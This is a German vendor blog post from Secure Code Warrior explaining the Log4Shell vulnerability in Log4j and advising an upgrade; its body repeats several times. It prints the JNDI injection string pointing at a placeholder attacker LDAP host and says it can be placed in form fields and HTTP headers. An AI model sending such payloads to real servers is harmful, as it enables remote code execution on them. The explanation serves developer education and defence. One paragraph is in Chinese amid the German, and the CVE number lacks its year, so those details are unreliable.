SCW-Symbole
Held-Hintergrund ohne Trennlinie
Blog

Log4j-Sicherheitslücke im Detail – Angriffsvektoren und Schutzmaßnahmen

Laura Verheyde
Veröffentlicht Jan 16, 2022
Zuletzt aktualisiert am 09. März 2026

Am 9. Dezember wurde eine Zero-Day-Sicherheitslücke in der Java-Bibliothek Log4j bekannt gegeben. CVE-44228, auch bekannt alsLog4Shell, wurde aufgrund der Möglichkeit der Remote-Code-Ausführungals„hochkritisch“ eingestuft. Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.

Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?

Wir haben eine Demo-Umgebung eingerichtet, die Sie von den Grundlagen von Log4Shell bis hin zur Ausnutzung dieser Sicherheitslücke in einem Simulator namens Mission führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo-Umgebung zu gelangen, oder lesen Sie weiter, um mehr über diese Sicherheitslücke zu erfahren.

Alte Nachrichten?

Diese Schwachstelle ist nichts Neues. Sicherheitsforscher haben bereits 2016 in einer BlackHat-Präsentation von Álvaro Muñoz und Oleksandr Mirosh betont,dass „Anwendungen keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen sollten”, und erklärt, wie gezielte JNDI/LDAP-Injektionen zur Remote-Code-Ausführung führen können. Genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Injektionslast von Log4Shell ist wie folgt:

$ {jndi: ldap: //attacker.host/xyz}

要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。

Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eineAPI, die es ermöglicht, Dienste über Protokolle wie LDAP, DNS, RMI usw. zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine bösartige Nutzlast eine Abfrage an einem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der dann auf dem anfälligen Server ausgeführt wird.

Die Schwachstelle ist deshalb so problematisch, weil Log4j alle Protokolleinträge auswertet und alle protokollierten Benutzereingaben abfragt, die mit der EL-Syntax mit dem Präfix „jndi“ geschrieben sind. Die Nutzlast kann überall dort injiziert werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowieandere Header so angepasst werden, dass sie die Nutzlast enthalten.

Um die Schwachstelle selbst zu erleben, besuchen Sie unseren Ausstellungsbereich und gehen Sie zu Schritt 2 – „Erleben Sie die Auswirkungen“.

Prävention: Bewusstsein

Es wird empfohlen, alle Anwendungen zu aktualisieren, da Log4j weiterhin an der Behebung des anfälligen Codes arbeitet. Die Versionen 2.15.0 und 2.16.0 enthalten jedoch DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf 2.17.0 empfohlen wird.

Bei der Entwicklung von Code müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns der Tatsache bewusst sein, dass die Verwendung externer Ressourcen die Sicherheit unserer Anwendungen beeinträchtigen kann, auch wenn wir naiv davon ausgehen, dass diese Ressourcen sicher sind.

Kann diese Sicherheitslücke verhindert werden? Ja und nein. Einerseits können Entwickler nur dann mehr tun, wenn anfällige Komponenten durch Software von Drittanbietern eingeführt werden. Andererseits wiederholt sich die daraus gewonnene Erkenntnis immer wieder: Man sollte niemals den Eingaben der Benutzer vertrauen.

Secure Code Warrior ist der Ansicht, dass sicherheitsbewusste Entwickler der beste Weg sind, um Code-Schwachstellen zu verhindern. Da SCW Schulungen für bestimmte Programmierframeworks in großem Umfang anbietet, können Unternehmenskunden anhand der Berichtsdaten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem setzen sie auf von SCW geschulte Sicherheitsbeauftragte, um die Aktualisierung von Log4j zu beschleunigen.

InsbesondereSecure Code Warrior Java-EntwicklerSecure Code Warrior SenseiIntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Regel-Rezepteverwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Rezept herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.

Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell

Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unsere Demo-Umgebung kann Ihnen dabei helfen. Zu Beginn der Demo erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden anschließend in eine simulierte Umgebung weitergeleitet, in der Sie die Schwachstelle anhand von Anweisungen ausprobieren können.


Ressourcen anzeigen
Ressourcen anzeigen

Im Dezember 2021 wurde eine schwerwiegende Sicherheitslücke namens Log4Shell in der Java-Bibliothek Log4j bekannt gegeben. In diesem Artikel werden wir die Log4Shell-Sicherheitslücke auf ihre einfachste Form herunterbrechen, damit Sie die Grundlagen verstehen können, und Ihnen eine Aufgabe vorstellen – einen Spielplatz, auf dem Sie Ihr Wissen über diese Sicherheitslücke nutzen können, um zu versuchen, eine simulierte Website anzugreifen.

Interessiert an mehr?

mehr erfahren

Secure Code Warrior kann Ihrem Unternehmen dabei helfen, Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit an erster Stelle steht. Ganz gleich, ob Sie AppSec-Manager, Entwickler, Chief Information Security Officer oder in einem anderen sicherheitsrelevanten Bereich tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu minimieren.

Demo buchen
Teilen auf:
LinkedIn-MarkenSozialx Logo
作者
Laura Verheyde
Veröffentlicht Jan 16, 2022

Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.

Teilen auf:
LinkedIn-MarkenSozialx Logo

Am 9. Dezember wurde eine Zero-Day-Sicherheitslücke in der Java-Bibliothek Log4j bekannt gegeben. CVE-44228, auch bekannt alsLog4Shell, wurde aufgrund der Möglichkeit der Remote-Code-Ausführungals„hochkritisch“ eingestuft. Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.

Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?

Wir haben eine Demo-Umgebung eingerichtet, die Sie von den Grundlagen von Log4Shell bis hin zur Ausnutzung dieser Sicherheitslücke in einem Simulator namens Mission führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo-Umgebung zu gelangen, oder lesen Sie weiter, um mehr über diese Sicherheitslücke zu erfahren.

Alte Nachrichten?

Diese Schwachstelle ist nichts Neues. Sicherheitsforscher haben bereits 2016 in einer BlackHat-Präsentation von Álvaro Muñoz und Oleksandr Mirosh betont,dass „Anwendungen keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen sollten”, und erklärt, wie gezielte JNDI/LDAP-Injektionen zur Remote-Code-Ausführung führen können. Genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Injektionslast von Log4Shell ist wie folgt:

$ {jndi: ldap: //attacker.host/xyz}

要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。

Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eineAPI, die es ermöglicht, Dienste über Protokolle wie LDAP, DNS, RMI usw. zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine bösartige Nutzlast eine Abfrage an einem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der dann auf dem anfälligen Server ausgeführt wird.

Die Schwachstelle ist deshalb so problematisch, weil Log4j alle Protokolleinträge auswertet und alle protokollierten Benutzereingaben abfragt, die mit der EL-Syntax mit dem Präfix „jndi“ geschrieben sind. Die Nutzlast kann überall dort injiziert werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowieandere Header so angepasst werden, dass sie die Nutzlast enthalten.

Um die Schwachstelle selbst zu erleben, besuchen Sie unseren Ausstellungsbereich und gehen Sie zu Schritt 2 – „Erleben Sie die Auswirkungen“.

Prävention: Bewusstsein

Es wird empfohlen, alle Anwendungen zu aktualisieren, da Log4j weiterhin an der Behebung des anfälligen Codes arbeitet. Die Versionen 2.15.0 und 2.16.0 enthalten jedoch DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf 2.17.0 empfohlen wird.

Bei der Entwicklung von Code müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns der Tatsache bewusst sein, dass die Verwendung externer Ressourcen die Sicherheit unserer Anwendungen beeinträchtigen kann, auch wenn wir naiv davon ausgehen, dass diese Ressourcen sicher sind.

Kann diese Sicherheitslücke verhindert werden? Ja und nein. Einerseits können Entwickler nur dann mehr tun, wenn anfällige Komponenten durch Software von Drittanbietern eingeführt werden. Andererseits wiederholt sich die daraus gewonnene Erkenntnis immer wieder: Man sollte niemals den Eingaben der Benutzer vertrauen.

Secure Code Warrior ist der Ansicht, dass sicherheitsbewusste Entwickler der beste Weg sind, um Code-Schwachstellen zu verhindern. Da SCW Schulungen für bestimmte Programmierframeworks in großem Umfang anbietet, können Unternehmenskunden anhand der Berichtsdaten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem setzen sie auf von SCW geschulte Sicherheitsbeauftragte, um die Aktualisierung von Log4j zu beschleunigen.

InsbesondereSecure Code Warrior Java-EntwicklerSecure Code Warrior SenseiIntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Regel-Rezepteverwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Rezept herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.

Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell

Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unsere Demo-Umgebung kann Ihnen dabei helfen. Zu Beginn der Demo erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden anschließend in eine simulierte Umgebung weitergeleitet, in der Sie die Schwachstelle anhand von Anweisungen ausprobieren können.


Ressourcen anzeigen
Ressourcen anzeigen

Füllen Sie das folgende Formular aus, um den Bericht herunterzuladen.

Wir möchten Ihre Erlaubnis einholen, Ihnen Informationen über unsere Produkte und/oder relevante Themen zur Sicherheit von Codes zuzusenden. Wir werden Ihre personenbezogenen Daten stets mit größter Sorgfalt behandeln und sie niemals zu Marketingzwecken an andere Unternehmen verkaufen.

Einreichen
scw Erfolgssymbol
scw-Fehlersymbol
Um das Formular zu senden, aktivieren Sie bitte die „Analyse“-Cookies. Nach Abschluss können Sie diese wieder deaktivieren.

Am 9. Dezember wurde eine Zero-Day-Sicherheitslücke in der Java-Bibliothek Log4j bekannt gegeben. CVE-44228, auch bekannt alsLog4Shell, wurde aufgrund der Möglichkeit der Remote-Code-Ausführungals„hochkritisch“ eingestuft. Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.

Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?

Wir haben eine Demo-Umgebung eingerichtet, die Sie von den Grundlagen von Log4Shell bis hin zur Ausnutzung dieser Sicherheitslücke in einem Simulator namens Mission führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo-Umgebung zu gelangen, oder lesen Sie weiter, um mehr über diese Sicherheitslücke zu erfahren.

Alte Nachrichten?

Diese Schwachstelle ist nichts Neues. Sicherheitsforscher haben bereits 2016 in einer BlackHat-Präsentation von Álvaro Muñoz und Oleksandr Mirosh betont,dass „Anwendungen keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen sollten”, und erklärt, wie gezielte JNDI/LDAP-Injektionen zur Remote-Code-Ausführung führen können. Genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Injektionslast von Log4Shell ist wie folgt:

$ {jndi: ldap: //attacker.host/xyz}

要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。

Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eineAPI, die es ermöglicht, Dienste über Protokolle wie LDAP, DNS, RMI usw. zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine bösartige Nutzlast eine Abfrage an einem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der dann auf dem anfälligen Server ausgeführt wird.

Die Schwachstelle ist deshalb so problematisch, weil Log4j alle Protokolleinträge auswertet und alle protokollierten Benutzereingaben abfragt, die mit der EL-Syntax mit dem Präfix „jndi“ geschrieben sind. Die Nutzlast kann überall dort injiziert werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowieandere Header so angepasst werden, dass sie die Nutzlast enthalten.

Um die Schwachstelle selbst zu erleben, besuchen Sie unseren Ausstellungsbereich und gehen Sie zu Schritt 2 – „Erleben Sie die Auswirkungen“.

Prävention: Bewusstsein

Es wird empfohlen, alle Anwendungen zu aktualisieren, da Log4j weiterhin an der Behebung des anfälligen Codes arbeitet. Die Versionen 2.15.0 und 2.16.0 enthalten jedoch DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf 2.17.0 empfohlen wird.

Bei der Entwicklung von Code müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns der Tatsache bewusst sein, dass die Verwendung externer Ressourcen die Sicherheit unserer Anwendungen beeinträchtigen kann, auch wenn wir naiv davon ausgehen, dass diese Ressourcen sicher sind.

Kann diese Sicherheitslücke verhindert werden? Ja und nein. Einerseits können Entwickler nur dann mehr tun, wenn anfällige Komponenten durch Software von Drittanbietern eingeführt werden. Andererseits wiederholt sich die daraus gewonnene Erkenntnis immer wieder: Man sollte niemals den Eingaben der Benutzer vertrauen.

Secure Code Warrior ist der Ansicht, dass sicherheitsbewusste Entwickler der beste Weg sind, um Code-Schwachstellen zu verhindern. Da SCW Schulungen für bestimmte Programmierframeworks in großem Umfang anbietet, können Unternehmenskunden anhand der Berichtsdaten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem setzen sie auf von SCW geschulte Sicherheitsbeauftragte, um die Aktualisierung von Log4j zu beschleunigen.

InsbesondereSecure Code Warrior Java-EntwicklerSecure Code Warrior SenseiIntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Regel-Rezepteverwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Rezept herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.

Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell

Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unsere Demo-Umgebung kann Ihnen dabei helfen. Zu Beginn der Demo erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden anschließend in eine simulierte Umgebung weitergeleitet, in der Sie die Schwachstelle anhand von Anweisungen ausprobieren können.


Webinar ansehen
Fangen wir an.
mehr erfahren

Klicken Sie auf den folgenden Link und laden Sie die PDF-Datei dieser Ressource herunter.

Secure Code Warrior kann Ihrem Unternehmen dabei helfen, Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit an erster Stelle steht. Ganz gleich, ob Sie AppSec-Manager, Entwickler, Chief Information Security Officer oder in einem anderen sicherheitsrelevanten Bereich tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu minimieren.

Bericht anzeigenDemo buchen
Ressourcen anzeigen
Teilen auf:
LinkedIn-MarkenSozialx Logo
Interessiert an mehr?

Teilen auf:
LinkedIn-MarkenSozialx Logo
作者
Laura Verheyde
Veröffentlicht Jan 16, 2022

Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.

Teilen auf:
LinkedIn-MarkenSozialx Logo

Am 9. Dezember wurde eine Zero-Day-Sicherheitslücke in der Java-Bibliothek Log4j bekannt gegeben. CVE-44228, auch bekannt alsLog4Shell, wurde aufgrund der Möglichkeit der Remote-Code-Ausführungals„hochkritisch“ eingestuft. Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.

Möchten Sie Ihre Fähigkeiten im Umgang mit Log4Shell schnell verbessern?

Wir haben eine Demo-Umgebung eingerichtet, die Sie von den Grundlagen von Log4Shell bis hin zur Ausnutzung dieser Sicherheitslücke in einem Simulator namens Mission führt. In dieser Mission zeigen wir Ihnen, wie sich die Log4j-Sicherheitslücke auf Ihre Infrastruktur und Anwendungen auswirken kann. Klicken Sie hier, um direkt zur Demo-Umgebung zu gelangen, oder lesen Sie weiter, um mehr über diese Sicherheitslücke zu erfahren.

Alte Nachrichten?

Diese Schwachstelle ist nichts Neues. Sicherheitsforscher haben bereits 2016 in einer BlackHat-Präsentation von Álvaro Muñoz und Oleksandr Mirosh betont,dass „Anwendungen keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen sollten”, und erklärt, wie gezielte JNDI/LDAP-Injektionen zur Remote-Code-Ausführung führen können. Genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Injektionslast von Log4Shell ist wie folgt:

$ {jndi: ldap: //attacker.host/xyz}

要理解这一点,我们需要了解 Java 的表达式语言 (EL)。用以下语法编写的表达式: $ {expr} 将在运行时进行评估。例如,$ {java: version} 将返回正在使用的 Java 版本。

Als Nächstes kommt JNDI, oder Java Naming and Directory Interface, eineAPI, die es ermöglicht, Dienste über Protokolle wie LDAP, DNS, RMI usw. zu verbinden, um Daten oder Ressourcen abzurufen. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine bösartige Nutzlast eine Abfrage an einem vom Angreifer kontrollierten LDAP-Server durch. Die Antwort könnte beispielsweise auf eine Java-Klassendatei verweisen, die bösartigen Code enthält, der dann auf dem anfälligen Server ausgeführt wird.

Die Schwachstelle ist deshalb so problematisch, weil Log4j alle Protokolleinträge auswertet und alle protokollierten Benutzereingaben abfragt, die mit der EL-Syntax mit dem Präfix „jndi“ geschrieben sind. Die Nutzlast kann überall dort injiziert werden, wo Benutzer Daten eingeben können, z. B. in Formularfeldern. Darüber hinaus können HTTP-Header wie User-Agent und X-Forwarded-For sowieandere Header so angepasst werden, dass sie die Nutzlast enthalten.

Um die Schwachstelle selbst zu erleben, besuchen Sie unseren Ausstellungsbereich und gehen Sie zu Schritt 2 – „Erleben Sie die Auswirkungen“.

Prävention: Bewusstsein

Es wird empfohlen, alle Anwendungen zu aktualisieren, da Log4j weiterhin an der Behebung des anfälligen Codes arbeitet. Die Versionen 2.15.0 und 2.16.0 enthalten jedoch DDoS- und andere Schwachstellen, sodass ab Ende Dezember ein Upgrade auf 2.17.0 empfohlen wird.

Bei der Entwicklung von Code müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns der Tatsache bewusst sein, dass die Verwendung externer Ressourcen die Sicherheit unserer Anwendungen beeinträchtigen kann, auch wenn wir naiv davon ausgehen, dass diese Ressourcen sicher sind.

Kann diese Sicherheitslücke verhindert werden? Ja und nein. Einerseits können Entwickler nur dann mehr tun, wenn anfällige Komponenten durch Software von Drittanbietern eingeführt werden. Andererseits wiederholt sich die daraus gewonnene Erkenntnis immer wieder: Man sollte niemals den Eingaben der Benutzer vertrauen.

Secure Code Warrior ist der Ansicht, dass sicherheitsbewusste Entwickler der beste Weg sind, um Code-Schwachstellen zu verhindern. Da SCW Schulungen für bestimmte Programmierframeworks in großem Umfang anbietet, können Unternehmenskunden anhand der Berichtsdaten schnell herausfinden, welche Java-Entwickler betroffen sind. Außerdem setzen sie auf von SCW geschulte Sicherheitsbeauftragte, um die Aktualisierung von Log4j zu beschleunigen.

InsbesondereSecure Code Warrior Java-EntwicklerSecure Code Warrior SenseiIntelliJ-Plugin. Dieses regelbasierte Code-Analyse-Tool kann zur Durchsetzung von Codierungsrichtlinien sowie zur Vorbeugung und Behebung von Schwachstellen eingesetzt werden. Sie können Ihre eigenen Regeln erstellen oder unsere vorgefertigten Regel-Rezepteverwenden. Stöbern Sie in unseren Rezepten und vergessen Sie nicht, unser Log4j-Rezept herunterzuladen, mit dem Sie die Log4Shell-Sicherheitslücke im Handumdrehen finden und beheben können.

Verbessern Sie Ihre Fähigkeiten zur Abwehr von Log4Shell

Möchten Sie das in diesem Blogbeitrag Gelernte in die Praxis umsetzen? Unsere Demo-Umgebung kann Ihnen dabei helfen. Zu Beginn der Demo erhalten Sie einen kurzen Überblick über diese Schwachstelle und werden anschließend in eine simulierte Umgebung weitergeleitet, in der Sie die Schwachstelle anhand von Anweisungen ausprobieren können.


Verzeichnis

PDF herunterladen
Ressourcen anzeigen
Interessiert an mehr?

mehr erfahren

Secure Code Warrior kann Ihrem Unternehmen dabei helfen, Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit an erster Stelle steht. Ganz gleich, ob Sie AppSec-Manager, Entwickler, Chief Information Security Officer oder in einem anderen sicherheitsrelevanten Bereich tätig sind – wir können Ihrem Unternehmen dabei helfen, die mit unsicherem Code verbundenen Risiken zu minimieren.

Demo buchen下载
Teilen auf:
LinkedIn-MarkenSozialx Logo
Ressourcenzentrum

Ressourcen, die Ihnen den Einstieg erleichtern

Weitere Beiträge
Ressourcenzentrum

Ressourcen, die Ihnen den Einstieg erleichtern

Weitere Beiträge